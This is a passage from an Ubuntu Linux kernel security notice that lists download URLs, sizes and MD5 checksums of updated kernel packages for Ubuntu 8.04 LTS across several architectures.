http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz
  Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc
  Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb
  Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb
  Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb
  Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb
  Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    52646 2c736bab70f1efeade320f9062b74729
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   145458 3e087634d61556643c32e342214a0642
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb
  Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    21598 6d6c27b8756a70466451449e096bd149
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    23690 ceb5d148f00965516252470b41d00b56
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    26794 50bb7020338de7d00265de0765578291
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32672 7135f346092b651dafed111b91aee44d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    47602 e55422dc48484675642c96bdbc673595
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2089276 69416120cd161789b598b2b93034db07
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb
  Size/MD5:   707576 d26794effd4e857da1db4d28e9407611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163034 9cc84b270528d0fef36320974b415392
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   236710 755a3caeceece8650e46706804c6e072
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   150836 169c287e6bc754d02924a719d34aad29
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   156072 9ff98bc4b62d033785de95858201c353
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    33388 860c1b56a45914246929757c815f5ec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92446 6525df043e2a865a6eb646f015140e31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb
  Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   334046 06512921aae848be603af54dc56f72e6
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    62718 e53308b729496be4a0e343535769c74e
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061
